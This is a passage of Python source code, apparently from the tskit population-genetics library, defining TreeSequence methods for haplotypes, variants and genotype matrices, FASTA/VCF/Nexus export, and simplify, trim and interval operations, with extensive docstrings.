yield Interval(left, right), tree1, tree2
# Advance
if tree1.interval.right == right:
tree1 = next(trees1, None)
if tree2.interval.right == right:
tree2 = next(trees2, None)
def haplotypes(
self,
*,
isolated_as_missing=None,
missing_data_character="-",
impute_missing_data=None,
):
"""
Returns an iterator over the strings of haplotypes that result from
the trees and mutations in this tree sequence. Each haplotype string
is guaranteed to be of the same length. A tree sequence with
:math:`n` samples and :math:`s` sites will return a total of :math:`n`
strings of :math:`s` alleles concatenated together, where an allele
consists of a single ascii character (tree sequences that include alleles
which are not a single character in length, or where the character is
non-ascii, will raise an error). The first string returned is the
haplotype for sample ``0``, and so on.
The alleles at each site must be represented by single byte characters,
(i.e. variants must be single nucleotide polymorphisms, or SNPs), hence
the strings returned will all be of length :math:`s`, and for a haplotype
``h``, the value of ``h[j]`` will be the observed allelic state
at site ``j``.
If ``isolated_as_missing`` is True (the default), isolated samples without
mutations directly above them will be treated as
:ref:`missing data<sec_data_model_missing_data>` and will be
represented in the string by the ``missing_data_character``. If
instead it is set to False, missing data will be assigned the ancestral state
(unless they have mutations directly above them, in which case they will take
the most recent derived mutational state for that node). This was the default
behaviour in versions prior to 0.2.0. Prior to 0.3.0 the `impute_missing_data`
argument controlled this behaviour.
See also the :meth:`.variants` iterator for site-centric access
to sample genotypes.
.. warning::
For large datasets, this method can consume a **very large** amount of
memory! To output all the sample data, it is more efficient to iterate
over sites rather than over samples. If you have a large dataset but only
want to output the haplotypes for a subset of samples, it may be worth
calling :meth:`.simplify` to reduce tree sequence down to the required
samples before outputting haplotypes.
:return: An iterator over the haplotype strings for the samples in
this tree sequence.
:param bool isolated_as_missing: If True, the allele assigned to
missing samples (i.e., isolated samples without mutations) is
the ``missing_data_character``. If False,
missing samples will be assigned the ancestral state.
Default: True.
:param str missing_data_character: A single ascii character that will
be used to represent missing data.
If any normal allele contains this character, an error is raised.
Default: '-'.
:param bool impute_missing_data:
*Deprecated in 0.3.0. Use ``isolated_as_missing``, but inverting value.
Will be removed in a future version*
:rtype: collections.abc.Iterable
:raises: TypeError if the ``missing_data_character`` or any of the alleles
at a site or the are not a single ascii character.
:raises: ValueError
if the ``missing_data_character`` exists in one of the alleles
"""
if impute_missing_data is not None:
warnings.warn(
"The impute_missing_data parameter was deprecated in 0.3.0 and will"
" be removed. Use ``isolated_as_missing=False`` instead of"
"``impute_missing_data=True``.",
FutureWarning,
)
# Only use impute_missing_data if isolated_as_missing has the default value
if isolated_as_missing is None:
isolated_as_missing = not impute_missing_data
H = np.empty((self.num_samples, self.num_sites), dtype=np.int8)
missing_int8 = ord(missing_data_character.encode("ascii"))
for var in self.variants(isolated_as_missing=isolated_as_missing):
alleles = np.full(len(var.alleles), missing_int8, dtype=np.int8)
for i, allele in enumerate(var.alleles):
if allele is not None:
if len(allele) != 1:
raise TypeError(
"Multi-letter allele or deletion detected at site {}".format(
var.site.id
)
)
try:
ascii_allele = allele.encode("ascii")
except UnicodeEncodeError:
raise TypeError(
"Non-ascii character in allele at site {}".format(
var.site.id
)
)
allele_int8 = ord(ascii_allele)
if allele_int8 == missing_int8:
raise ValueError(
"The missing data character '{}' clashes with an "
"existing allele at site {}".format(
missing_data_character, var.site.id
)
)
alleles[i] = allele_int8
H[:, var.site.id] = alleles[var.genotypes]
for h in H:
yield h.tobytes().decode("ascii")
def variants(
self,
*,
as_bytes=False,
samples=None,
isolated_as_missing=None,
alleles=None,
impute_missing_data=None,
):
"""
Returns an iterator over the variants in this tree sequence. See the
:class:`Variant` class for details on the fields of each returned
object. The ``genotypes`` for the variants are numpy arrays,
corresponding to indexes into the ``alleles`` attribute in the
:class:`Variant` object. By default, the ``alleles`` for each
site are generated automatically, such that the ancestral state
is at the zeroth index and subsequent alleles are listed in no
particular order. This means that the encoding of alleles in
terms of genotype values can vary from site-to-site, which is
sometimes inconvenient. It is possible to specify a fixed mapping
from allele strings to genotype values using the ``alleles``
parameter. For example, if we set ``alleles=("A", "C", "G", "T")``,
this will map allele "A" to 0, "C" to 1 and so on (the
:data:`ALLELES_ACGT` constant provides a shortcut for this
common mapping).
By default, genotypes are generated for all samples. The ``samples``
parameter allows us to specify the nodes for which genotypes are
generated; output order of genotypes in the returned variants
corresponds to the order of the samples in this list. It is also
possible to provide **non-sample** nodes as an argument here, if you
wish to generate genotypes for (e.g.) internal nodes. However,
``isolated_as_missing`` must be False in this case, as it is not
possible to detect missing data for non-sample nodes.
If isolated samples are present at a given site without mutations above them,
they will be interpreted as :ref:`missing data<sec_data_model_missing_data>`
the genotypes array will contain a special value :data:`MISSING_DATA`
(-1) to identify these missing samples, and the ``alleles`` tuple will
end with the value ``None`` (note that this is true whether we specify
a fixed mapping using the ``alleles`` parameter or not).
See the :class:`Variant` class for more details on how missing data is
reported.
Such samples are treated as missing data by default, but if
``isolated_as_missing`` is set to to False, they will not be treated as
missing, and so assigned the ancestral state.
This was the default behaviour in versions prior to 0.2.0. Prior to 0.3.0
the `impute_missing_data` argument controlled this behaviour.
.. note::
The ``as_bytes`` parameter is kept as a compatibility
option for older code. It is not the recommended way of
accessing variant data, and will be deprecated in a later
release.
:param bool as_bytes: If True, the genotype values will be returned
as a Python bytes object. Legacy use only.
:param array_like samples: An array of node IDs for which to generate
genotypes, or None for all sample nodes. Default: None.
:param bool isolated_as_missing: If True, the allele assigned to
missing samples (i.e., isolated samples without mutations) is
the ``missing_data_character``. If False, missing samples will be
assigned the ancestral state.
Default: True.
:param tuple alleles: A tuple of strings defining the encoding of
alleles as integer genotype values. At least one allele must be provided.
If duplicate alleles are provided, output genotypes will always be
encoded as the first occurance of the allele. If None (the default),
the alleles are encoded as they are encountered during genotype
generation.
:param bool impute_missing_data:
*Deprecated in 0.3.0. Use ``isolated_as_missing``, but inverting value.
Will be removed in a future version*
:return: An iterator of all variants this tree sequence.
:rtype: iter(:class:`Variant`)
"""
if impute_missing_data is not None:
warnings.warn(
"The impute_missing_data parameter was deprecated in 0.3.0 and will"
" be removed. Use ``isolated_as_missing=False`` instead of"
"``impute_missing_data=True``.",
FutureWarning,
)
# Only use impute_missing_data if isolated_as_missing has the default value
if isolated_as_missing is None:
isolated_as_missing = not impute_missing_data
# See comments for the Variant type for discussion on why the
# present form was chosen.
iterator = _tskit.VariantGenerator(
self._ll_tree_sequence,
samples=samples,
isolated_as_missing=isolated_as_missing,
alleles=alleles,
)
for site_id, genotypes, alleles in iterator:
site = self.site(site_id)
if as_bytes:
if any(len(allele) > 1 for allele in alleles):
raise ValueError(
"as_bytes only supported for single-letter alleles"
)
bytes_genotypes = np.empty(self.num_samples, dtype=np.uint8)
lookup = np.array([ord(a[0]) for a in alleles], dtype=np.uint8)
bytes_genotypes[:] = lookup[genotypes]
genotypes = bytes_genotypes.tobytes()
yield Variant(site, alleles, genotypes)
def genotype_matrix(
self, *, isolated_as_missing=None, alleles=None, impute_missing_data=None
):
"""
Returns an :math:`m \\times n` numpy array of the genotypes in this
tree sequence, where :math:`m` is the number of sites and :math:`n`
the number of samples. The genotypes are the indexes into the array
of ``alleles``, as described for the :class:`Variant` class.
If isolated samples are present at a given site without mutations above them,
they will be interpreted as :ref:`missing data<sec_data_model_missing_data>`
the genotypes array will contain a special value :data:`MISSING_DATA`
(-1) to identify these missing samples.
Such samples are treated as missing data by default, but if
``isolated_as_missing`` is set to to False, they will not be treated as missing,
and so assigned the ancestral state. This was the default behaviour in
versions prior to 0.2.0. Prior to 0.3.0 the `impute_missing_data`
argument controlled this behaviour.
.. warning::
This method can consume a **very large** amount of memory! If
all genotypes are not needed at once, it is usually better to
access them sequentially using the :meth:`.variants` iterator.
:param bool isolated_as_missing: If True, the allele assigned to
missing samples (i.e., isolated samples without mutations) is
the ``missing_data_character``. If False, missing samples will be
assigned the ancestral state.
Default: True.
:param tuple alleles: A tuple of strings describing the encoding of
alleles to genotype values. At least one allele must be provided.
If duplicate alleles are provided, output genotypes will always be
encoded as the first occurance of the allele. If None (the default),
the alleles are encoded as they are encountered during genotype
generation.
:param bool impute_missing_data:
*Deprecated in 0.3.0. Use ``isolated_as_missing``, but inverting value.
Will be removed in a future version*
:return: The full matrix of genotypes.
:rtype: numpy.ndarray (dtype=np.int8)
"""
if impute_missing_data is not None:
warnings.warn(
"The impute_missing_data parameter was deprecated in 0.3.0 and will"
" be removed. Use ``isolated_as_missing=False`` instead of"
"``impute_missing_data=True``.",
FutureWarning,
)
# Only use impute_missing_data if isolated_as_missing has the default value
if isolated_as_missing is None:
isolated_as_missing = not impute_missing_data
return self._ll_tree_sequence.get_genotype_matrix(
isolated_as_missing=isolated_as_missing, alleles=alleles
)
def individual(self, id_):
"""
Returns the :ref:`individual <sec_individual_table_definition>`
in this tree sequence with the specified ID.
:rtype: :class:`Individual`
"""
(
flags,
location,
parents,
metadata,
nodes,
) = self._ll_tree_sequence.get_individual(id_)
return Individual(
id=id_,
flags=flags,
location=location,
parents=parents,
metadata=metadata,
nodes=nodes,
metadata_decoder=self.table_metadata_schemas.individual.decode_row,
)
def node(self, id_):
"""
Returns the :ref:`node <sec_node_table_definition>` in this tree sequence
with the specified ID.
:rtype: :class:`Node`
"""
(
flags,
time,
population,
individual,
metadata,
) = self._ll_tree_sequence.get_node(id_)
return Node(
id=id_,
flags=flags,
time=time,
population=population,
individual=individual,
metadata=metadata,
metadata_decoder=self.table_metadata_schemas.node.decode_row,
)
def edge(self, id_):
"""
Returns the :ref:`edge <sec_edge_table_definition>` in this tree sequence
with the specified ID.
:rtype: :class:`Edge`
"""
left, right, parent, child, metadata = self._ll_tree_sequence.get_edge(id_)
return Edge(
id=id_,
left=left,
right=right,
parent=parent,
child=child,
metadata=metadata,
metadata_decoder=self.table_metadata_schemas.edge.decode_row,
)
def _tree_node_edges(self):
"""
Return a generator over the trees in the tree sequence, yielding a numpy array
that maps the node IDs in the tree to the ID of the edge above them.
Currently this is a private, non-optimised Python implementation.
"""
node_edges = np.full(self.num_nodes, NULL, dtype=np.int32)
for _, edges_out, edges_in in self.edge_diffs():
for e in edges_out:
node_edges[e.child] = NULL
for e in edges_in:
node_edges[e.child] = e.id
yield node_edges
def migration(self, id_):
"""
Returns the :ref:`migration <sec_migration_table_definition>` in this tree
sequence with the specified ID.
:rtype: :class:`.Migration`
"""
(
left,
right,
node,
source,
dest,
time,
metadata,
) = self._ll_tree_sequence.get_migration(id_)
return Migration(
id=id_,
left=left,
right=right,
node=node,
source=source,
dest=dest,
time=time,
metadata=metadata,
metadata_decoder=self.table_metadata_schemas.migration.decode_row,
)
def mutation(self, id_):
"""
Returns the :ref:`mutation <sec_mutation_table_definition>` in this tree sequence
with the specified ID.
:rtype: :class:`Mutation`
"""
(
site,
node,
derived_state,
parent,
metadata,
time,
) = self._ll_tree_sequence.get_mutation(id_)
return Mutation(
id=id_,
site=site,
node=node,
derived_state=derived_state,
parent=parent,
metadata=metadata,
time=time,
metadata_decoder=self.table_metadata_schemas.mutation.decode_row,
)
def site(self, id_):
"""
Returns the :ref:`site <sec_site_table_definition>` in this tree sequence
with the specified ID.
:rtype: :class:`Site`
"""
ll_site = self._ll_tree_sequence.get_site(id_)
pos, ancestral_state, ll_mutations, _, metadata = ll_site
mutations = [self.mutation(mut_id) for mut_id in ll_mutations]
return Site(
id=id_,
position=pos,
ancestral_state=ancestral_state,
mutations=mutations,
metadata=metadata,
metadata_decoder=self.table_metadata_schemas.site.decode_row,
)
def population(self, id_):
"""
Returns the :ref:`population <sec_population_table_definition>`
in this tree sequence with the specified ID.
:rtype: :class:`Population`
"""
(metadata,) = self._ll_tree_sequence.get_population(id_)
return Population(
id=id_,
metadata=metadata,
metadata_decoder=self.table_metadata_schemas.population.decode_row,
)
def provenance(self, id_):
timestamp, record = self._ll_tree_sequence.get_provenance(id_)
return Provenance(id=id_, timestamp=timestamp, record=record)
def get_samples(self, population_id=None):
# Deprecated alias for samples()
return self.samples(population_id)
def samples(self, population=None, population_id=None):
"""
Returns an array of the sample node IDs in this tree sequence. If the
``population`` parameter is specified, only return sample IDs from that
population.
:param int population: The population of interest. If None,
return all samples.
:param int population_id: Deprecated alias for ``population``.
:return: A numpy array of the node IDs for the samples of interest,
listed in numerical order.
:rtype: numpy.ndarray (dtype=np.int32)
"""
if population is not None and population_id is not None:
raise ValueError(
"population_id and population are aliases. Cannot specify both"
)
if population_id is not None:
population = population_id
samples = self._ll_tree_sequence.get_samples()
if population is not None:
sample_population = self.tables.nodes.population[samples]
samples = samples[sample_population == population]
return samples
def write_fasta(self, output, sequence_ids=None, wrap_width=60):
""
# suppress fasta visibility pending https://github.com/tskit-dev/tskit/issues/353
"""
Writes haplotype data for samples in FASTA format to the
specified file-like object.
Default `sequence_ids` (i.e. the text immediately following ">") are
"tsk_{sample_number}" e.g. "tsk_0", "tsk_1" etc. They can be set by providing
a list of strings to the `sequence_ids` argument, which must equal the length
of the number of samples. Please ensure that these are unique and compatible with
fasta standards, since we do not check this.
Default `wrap_width` for sequences is 60 characters in accordance with fasta
standard outputs, but this can be specified. In order to avoid any line-wrapping
of sequences, set `wrap_width = 0`.
Example usage:
.. code-block:: python
with open("output.fasta", "w") as fasta_file:
ts.write_fasta(fasta_file)
This can also be achieved on the command line use the ``tskit fasta`` command,
e.g.:
.. code-block:: bash
$ tskit fasta example.trees > example.fasta
:param io.IOBase output: The file-like object to write the fasta output.
:param list(str) sequence_ids: A list of string names to uniquely identify
each of the sequences in the fasta file. If specified, this must be a
list of strings of length equal to the number of samples which are output.
Note that we do not check the form of these strings in any way, so that it
is possible to output bad fasta IDs (for example, by including spaces
before the unique identifying part of the string).
The default is to output ``tsk_j`` for the jth individual.
:param int wrap_width: This parameter specifies the number of sequence
characters to include on each line in the fasta file, before wrapping
to the next line for each sequence. Defaults to 60 characters in
accordance with fasta standard outputs. To avoid any line-wrapping of
sequences, set `wrap_width = 0`. Otherwise, supply any positive integer.
"""
# if not specified, IDs default to sample index
if sequence_ids is None:
sequence_ids = [f"tsk_{j}" for j in self.samples()]
if len(sequence_ids) != self.num_samples:
raise ValueError(
"sequence_ids must have length equal to the number of samples."
)
wrap_width = int(wrap_width)
if wrap_width < 0:
raise ValueError(
"wrap_width must be a non-negative integer. "
"You may specify `wrap_width=0` "
"if you do not want any wrapping."
)
for j, hap in enumerate(self.haplotypes()):
print(">", sequence_ids[j], sep="", file=output)
if wrap_width == 0:
print(hap, file=output)
else:
for hap_wrap in textwrap.wrap(hap, wrap_width):
print(hap_wrap, file=output)
def write_vcf(
self,
output,
ploidy=None,
contig_id="1",
individuals=None,
individual_names=None,
position_transform=None,
):
"""
Writes a VCF formatted file to the specified file-like object.
If there is individual information present in the tree sequence
(see :ref:`sec_individual_table_definition`), the values for
sample nodes associated with these individuals are combined
into phased multiploid individuals and output.
If there is no individual data present in the tree sequence, synthetic
individuals are created by combining adjacent samples, and the number
of samples combined is equal to the specified ploidy value (1 by
default). For example, if we have a ploidy of 2 and a sample of size 6,
then we will have 3 diploid samples in the output, consisting of the
combined genotypes for samples [0, 1], [2, 3] and [4, 5]. If we had
genotypes 011110 at a particular variant, then we would output the
diploid genotypes 0|1, 1|1 and 1|0 in VCF.
Each individual in the output is identified by a string; these are the
VCF "sample" names. By default, these are of the form ``tsk_0``,
``tsk_1`` etc, up to the number of individuals, but can be manually
specified using the ``individual_names`` argument. We do not check
for duplicates in this array, or perform any checks to ensure that
the output VCF is well-formed.
.. note::
Warning to ``plink`` users:
As the default first individual name is ``tsk_0``, ``plink`` will
throw this error when loading the VCF:
``Error: Sample ID ends with "_0", which induces an invalid IID of '0'.``
This can be fixed by using the ``individual_names`` argument
to set the names to anything where the first name doesn't end with ``_0``.
An example implementation for diploid individuals is:
.. code-block:: python
n_dip_indv = int(ts.num_samples / 2)
indv_names = [f"tsk_{str(i)}indv" for i in range(n_dip_indv)]
with open("output.vcf", "w") as vcf_file:
ts.write_vcf(vcf_file, ploidy=2, individual_names=indv_names)
Adding a second ``_`` (eg: ``tsk_0_indv``) is not recommended as
``plink`` uses ``_`` as the default separator for separating family
id and individual id, and two ``_`` will throw an error.
The REF value in the output VCF is the ancestral allele for a site
and ALT values are the remaining alleles. It is important to note,
therefore, that for real data this means that the REF value for a given
site **may not** be equal to the reference allele. We also do not
check that the alleles result in a valid VCF---for example, it is possible
to use the tab character as an allele, leading to a broken VCF.
The ``position_transform`` argument provides a way to flexibly translate
the genomic location of sites in tskit to the appropriate value in VCF.
There are two fundamental differences in the way that tskit and VCF define
genomic coordinates. The first is that tskit uses floating point values
to encode positions, whereas VCF uses integers. Thus, if the tree sequence
contains positions at non-integral locations there is an information loss
incurred by translating to VCF. By default, we round the site positions
to the nearest integer, such that there may be several sites with the
same integer position in the output. The second difference between VCF
and tskit is that VCF is defined to be a 1-based coordinate system, whereas
tskit uses 0-based. However, how coordinates are transformed depends
on the VCF parser, and so we do **not** account for this change in
coordinate system by default.
Example usage:
.. code-block:: python
with open("output.vcf", "w") as vcf_file:
tree_sequence.write_vcf(vcf_file, ploidy=2)
The VCF output can also be compressed using the :mod:`gzip` module, if you wish:
.. code-block:: python
import gzip
with gzip.open("output.vcf.gz", "wt") as f:
ts.write_vcf(f)
However, this gzipped VCF may not be fully compatible with downstream tools
such as tabix, which may require the VCF use the specialised bgzip format.
A general way to convert VCF data to various formats is to pipe the text
produced by ``tskit`` into ``bcftools``, as done here:
.. code-block:: python
import os
import subprocess
read_fd, write_fd = os.pipe()
write_pipe = os.fdopen(write_fd, "w")
with open("output.bcf", "w") as bcf_file:
proc = subprocess.Popen(
["bcftools", "view", "-O", "b"], stdin=read_fd, stdout=bcf_file
)
ts.write_vcf(write_pipe)
write_pipe.close()
os.close(read_fd)
proc.wait()
if proc.returncode != 0:
raise RuntimeError("bcftools failed with status:", proc.returncode)
This can also be achieved on the command line use the ``tskit vcf`` command,
e.g.:
.. code-block:: bash
$ tskit vcf example.trees | bcftools view -O b > example.bcf
:param io.IOBase output: The file-like object to write the VCF output.
:param int ploidy: The ploidy of the individuals to be written to
VCF. This sample size must be evenly divisible by ploidy.
:param str contig_id: The value of the CHROM column in the output VCF.
:param list(int) individuals: A list containing the individual IDs to
write out to VCF. Defaults to all individuals in the tree sequence.
:param list(str) individual_names: A list of string names to identify
individual columns in the VCF. In VCF nomenclature, these are the
sample IDs. If specified, this must be a list of strings of
length equal to the number of individuals to be output. Note that
we do not check the form of these strings in any way, so that is
is possible to output malformed VCF (for example, by embedding a
tab character within on of the names). The default is to output
``tsk_j`` for the jth individual.
:param position_transform: A callable that transforms the
site position values into integer valued coordinates suitable for
VCF. The function takes a single positional parameter x and must
return an integer numpy array the same dimension as x. By default,
this is set to ``numpy.round()`` which will round values to the
nearest integer. If the string "legacy" is provided here, the
pre 0.2.0 legacy behaviour of rounding values to the nearest integer
(starting from 1) and avoiding the output of identical positions
by incrementing is used.
"""
writer = vcf.VcfWriter(
self,
ploidy=ploidy,
contig_id=contig_id,
individuals=individuals,
individual_names=individual_names,
position_transform=position_transform,
)
writer.write(output)
def to_nexus(self, precision=14):
"""
Returns a `nexus encoding <https://en.wikipedia.org/wiki/Nexus_file>`_
of this tree sequence. Trees along the sequence are listed sequentially in
the TREES block. The tree spanning the interval :math:`[x, y)`` is
given the name "tree_x_y". Spatial positions are written at the
specified precision.
Nodes in the tree sequence are identified by the taxon labels of the
form ``f"tsk_{node.id}_{node.flags}"``, such that a node with ``id=5``
and ``flags=1`` will have the label ``"tsk_5_1"`` (please see the
:ref:`data model <sec_node_table_definition>` section for details
on the interpretation of node ID and flags values). These labels are
listed for all nodes in the tree sequence in the ``TAXLABELS`` block.
:param int precision: The numerical precision with which branch lengths
and tree positions are printed.
:return: A nexus representation of this TreeSequence.
:rtype: str
"""
node_labels = {node.id: f"tsk_{node.id}_{node.flags}" for node in self.nodes()}
s = "#NEXUS\n"
s += "BEGIN TAXA;\n"
s += "TAXLABELS "
s += ",".join(node_labels[node.id] for node in self.nodes()) + ";\n"
s += "END;\n"
s += "BEGIN TREES;\n"
for tree in self.trees():
start_interval = "{0:.{1}f}".format(tree.interval.left, precision)
end_interval = "{0:.{1}f}".format(tree.interval.right, precision)
newick = tree.newick(precision=precision, node_labels=node_labels)
s += f"\tTREE tree{start_interval}_{end_interval} = {newick}\n"
s += "END;\n"
return s
def to_macs(self):
"""
Return a `macs encoding <https://github.com/gchen98/macs>`_
of this tree sequence.
:return: The macs representation of this TreeSequence as a string.
:rtype: str
"""
n = self.get_sample_size()
m = self.get_sequence_length()
output = [f"COMMAND:\tnot_macs {n} {m}"]
output.append("SEED:\tASEED")
for variant in self.variants(as_bytes=True):
output.append(
f"SITE:\t{variant.index}\t{variant.position / m}\t0.0\t"
f"{variant.genotypes.decode()}"
)
return "\n".join(output) + "\n"
def simplify(
self,
samples=None,
*,
map_nodes=False,
reduce_to_site_topology=False,
filter_populations=True,
filter_individuals=True,
filter_sites=True,
keep_unary=False,
keep_unary_in_individuals=None,
keep_input_roots=False,
record_provenance=True,
filter_zero_mutation_sites=None, # Deprecated alias for filter_sites
):
"""
Returns a simplified tree sequence that retains only the history of
the nodes given in the list ``samples``. If ``map_nodes`` is true,
also return a numpy array whose ``u``th element is the ID of the node
in the simplified tree sequence that corresponds to node ``u`` in the
original tree sequence, or :data:`tskit.NULL` (-1) if ``u`` is no longer
present in the simplified tree sequence.
In the returned tree sequence, the node with ID ``0`` corresponds to
``samples[0]``, node ``1`` corresponds to ``samples[1]`` etc., and all
the passed-in nodes are flagged as samples. The remaining node IDs in
the returned tree sequence are allocated sequentially in time order
and are not flagged as samples.
If you wish to simplify a set of tables that do not satisfy all
requirements for building a TreeSequence, then use
:meth:`TableCollection.simplify`.
If the ``reduce_to_site_topology`` parameter is True, the returned tree
sequence will contain only topological information that is necessary to
represent the trees that contain sites. If there are zero sites in this
tree sequence, this will result in an output tree sequence with zero edges.
When the number of sites is greater than zero, every tree in the output
tree sequence will contain at least one site. For a given site, the
topology of the tree containing that site will be identical
(up to node ID remapping) to the topology of the corresponding tree
in the input tree sequence.
If ``filter_populations``, ``filter_individuals`` or ``filter_sites`` is
True, any of the corresponding objects that are not referenced elsewhere
are filtered out. As this is the default behaviour, it is important to
realise IDs for these objects may change through simplification. By setting
these parameters to False, however, the corresponding tables can be preserved
without changes.
:param list[int] samples: A list of node IDs to retain as samples. They
need not be nodes marked as samples in the original tree sequence, but
will constitute the entire set of samples in the returned tree sequence.
If not specified or None, use all nodes marked with the IS_SAMPLE flag.
The list may be provided as a numpy array (or array-like) object
(dtype=np.int32).
:param bool map_nodes: If True, return a tuple containing the resulting
tree sequence and a numpy array mapping node IDs in the current tree
sequence to their corresponding node IDs in the returned tree sequence.
If False (the default), return only the tree sequence object itself.
:param bool reduce_to_site_topology: Whether to reduce the topology down
to the trees that are present at sites. (Default: False)
:param bool filter_populations: If True, remove any populations that are
not referenced by nodes after simplification; new population IDs are
allocated sequentially from zero. If False, the population table will
not be altered in any way. (Default: True)
:param bool filter_individuals: If True, remove any individuals that are
not referenced by nodes after simplification; new individual IDs are
allocated sequentially from zero. If False, the individual table will
not be altered in any way. (Default: True)
:param bool filter_sites: If True, remove any sites that are
not referenced by mutations after simplification; new site IDs are
allocated sequentially from zero. If False, the site table will not
be altered in any way. (Default: True)
:param bool keep_unary: If True, preserve unary nodes (i.e. nodes with
exactly one child) that exist on the path from samples to root.
(Default: False)
:param bool keep_unary_in_individuals: If True, preserve unary nodes
that exist on the path from samples to root, but only if they are
associated with an individual in the individuals table. Cannot be
specified at the same time as ``keep_unary``. (Default: ``None``,
equivalent to False)
:param bool keep_input_roots: Whether to retain history ancestral to the
MRCA of the samples. If ``False``, no topology older than the MRCAs of the
samples will be included. If ``True`` the roots of all trees in the returned
tree sequence will be the same roots as in the original tree sequence.
(Default: False)
:param bool record_provenance: If True, record details of this call to
simplify in the returned tree sequence's provenance information
(Default: True).
:param bool filter_zero_mutation_sites: Deprecated alias for ``filter_sites``.
:return: The simplified tree sequence, or (if ``map_nodes`` is True)
a tuple consisting of the simplified tree sequence and a numpy array
mapping source node IDs to their corresponding IDs in the new tree
sequence.
:rtype: .TreeSequence or (.TreeSequence, numpy.ndarray)
"""
tables = self.dump_tables()
assert tables.sequence_length == self.sequence_length
node_map = tables.simplify(
samples=samples,
reduce_to_site_topology=reduce_to_site_topology,
filter_populations=filter_populations,
filter_individuals=filter_individuals,
filter_sites=filter_sites,
keep_unary=keep_unary,
keep_unary_in_individuals=keep_unary_in_individuals,
keep_input_roots=keep_input_roots,
record_provenance=record_provenance,
filter_zero_mutation_sites=filter_zero_mutation_sites,
)
new_ts = tables.tree_sequence()
assert new_ts.sequence_length == self.sequence_length
if map_nodes:
return new_ts, node_map
else:
return new_ts
def delete_sites(self, site_ids, record_provenance=True):
"""
Returns a copy of this tree sequence with the specified sites (and their
associated mutations) entirely removed. The site IDs do not need to be in any
particular order, and specifying the same ID multiple times does not have any
effect (i.e., calling ``tree_sequence.delete_sites([0, 1, 1])`` has the same
effect as calling ``tree_sequence.delete_sites([0, 1])``.
:param list[int] site_ids: A list of site IDs specifying the sites to remove.
:param bool record_provenance: If ``True``, add details of this operation to the
provenance information of the returned tree sequence. (Default: ``True``).
"""
tables = self.dump_tables()
tables.delete_sites(site_ids, record_provenance)
return tables.tree_sequence()
def delete_intervals(self, intervals, simplify=True, record_provenance=True):
"""
Returns a copy of this tree sequence for which information in the
specified list of genomic intervals has been deleted. Edges spanning these
intervals are truncated or deleted, and sites and mutations falling within
them are discarded. Note that it is the information in the intervals that
is deleted, not the intervals themselves, so in particular, all samples
will be isolated in the deleted intervals.
Note that node IDs may change as a result of this operation,
as by default :meth:`.simplify` is called on the returned tree sequence
to remove redundant nodes. If you wish to map node IDs onto the same
nodes before and after this method has been called, specify ``simplify=False``.
See also :meth:`.keep_intervals`, :meth:`.ltrim`, :meth:`.rtrim`, and
:ref:`missing data<sec_data_model_missing_data>`.
:param array_like intervals: A list (start, end) pairs describing the
genomic intervals to delete. Intervals must be non-overlapping and
in increasing order. The list of intervals must be interpretable as a
2D numpy array with shape (N, 2), where N is the number of intervals.
:param bool simplify: If True, return a simplified tree sequence where nodes
no longer used are discarded. (Default: True).
:param bool record_provenance: If ``True``, add details of this operation to the
provenance information of the returned tree sequence. (Default: ``True``).
:rtype: .TreeSequence
"""
tables = self.dump_tables()
tables.delete_intervals(intervals, simplify, record_provenance)
return tables.tree_sequence()
def keep_intervals(self, intervals, simplify=True, record_provenance=True):
"""
Returns a copy of this tree sequence which includes only information in
the specified list of genomic intervals. Edges are truncated to lie within
these intervals, and sites and mutations falling outside these intervals
are discarded. Note that it is the information outside the intervals that
is deleted, not the intervals themselves, so in particular, all samples
will be isolated outside of the retained intervals.
Note that node IDs may change as a result of this operation,
as by default :meth:`.simplify` is called on the returned tree sequence
to remove redundant nodes. If you wish to map node IDs onto the same
nodes before and after this method has been called, specify ``simplify=False``.
See also :meth:`.keep_intervals`, :meth:`.ltrim`, :meth:`.rtrim`, and
:ref:`missing data<sec_data_model_missing_data>`.
:param array_like intervals: A list (start, end) pairs describing the
genomic intervals to keep. Intervals must be non-overlapping and
in increasing order. The list of intervals must be interpretable as a
2D numpy array with shape (N, 2), where N is the number of intervals.
:param bool simplify: If True, return a simplified tree sequence where nodes
no longer used are discarded. (Default: True).
:param bool record_provenance: If True, add details of this operation to the
provenance information of the returned tree sequence.
(Default: True).
:rtype: .TreeSequence
"""
tables = self.dump_tables()
tables.keep_intervals(intervals, simplify, record_provenance)
return tables.tree_sequence()
def ltrim(self, record_provenance=True):
"""
Returns a copy of this tree sequence with a potentially changed coordinate
system, such that empty regions (i.e. those not covered by any edge) at the start
of the tree sequence are trimmed away, and the leftmost edge starts at position
0. This affects the reported position of sites and edges. Additionally, sites and
their associated mutations to the left of the new zero point are thrown away.
:param bool record_provenance: If True, add details of this operation to the
provenance information of the returned tree sequence. (Default: True).
"""
tables = self.dump_tables()
tables.ltrim(record_provenance)
return tables.tree_sequence()
def rtrim(self, record_provenance=True):
"""
Returns a copy of this tree sequence with the ``sequence_length`` property reset
so that the sequence ends at the end of the rightmost edge. Additionally, sites
and their associated mutations at positions greater than the new
``sequence_length`` are thrown away.
:param bool record_provenance: If True, add details of this operation to the
provenance information of the returned tree sequence. (Default: True).
"""
tables = self.dump_tables()
tables.rtrim(record_provenance)
return tables.tree_sequence()
def trim(self, record_provenance=True):
"""
Returns a copy of this tree sequence with any empty regions (i.e. those not
covered by any edge) on the right and left trimmed away. This may reset both the
coordinate system and the ``sequence_length`` property. It is functionally
equivalent to :meth:`.rtrim` followed by :meth:`.ltrim`. Sites and their
associated mutations in the empty regions are thrown away.
:param bool record_provenance: If True, add details of this operation to the
provenance information of the returned tree sequence. (Default: True).
"""
tables = self.dump_tables()
tables.trim(record_provenance)
return tables.tree_sequence()
def subset(
self,
nodes,
record_provenance=True,
reorder_populations=True,
remove_unreferenced=True,
):
"""
Returns a tree sequence containing only information directly
referencing the provided list of nodes to retain. The result will
retain only the nodes whose IDs are listed in ``nodes``, only edges for
which both parent and child are in ``nodes```, only mutations whose
node is in ``nodes``, and only individuals that are referred to by one
of the retained nodes. Note that this does *not* retain
the ancestry of these nodes - for that, see ::meth::`.simplify`.
This has the side effect of reordering the nodes, individuals, and
populations in the tree sequence: the nodes in the new tree sequence
will be in the order provided in ``nodes``, and both individuals and
populations will be ordered by the earliest retained node that refers
to them. (However, ``reorder_populations`` may be set to False
to keep the population table unchanged.)
By default, the method removes all individuals and populations not
referenced by any nodes, and all sites not referenced by any mutations.
To retain these unreferencd individuals, populations, and sites, pass
``remove_unreferenced=False``. If this is done, the site table will
remain unchanged, unreferenced individuals will appear at the end of
the individuals table (and in their original order), and unreferenced
populations will appear at the end of the population table (unless
``reorder_populations=False``).
.. seealso::
:meth:`.keep_intervals` for subsetting a given portion of the genome;
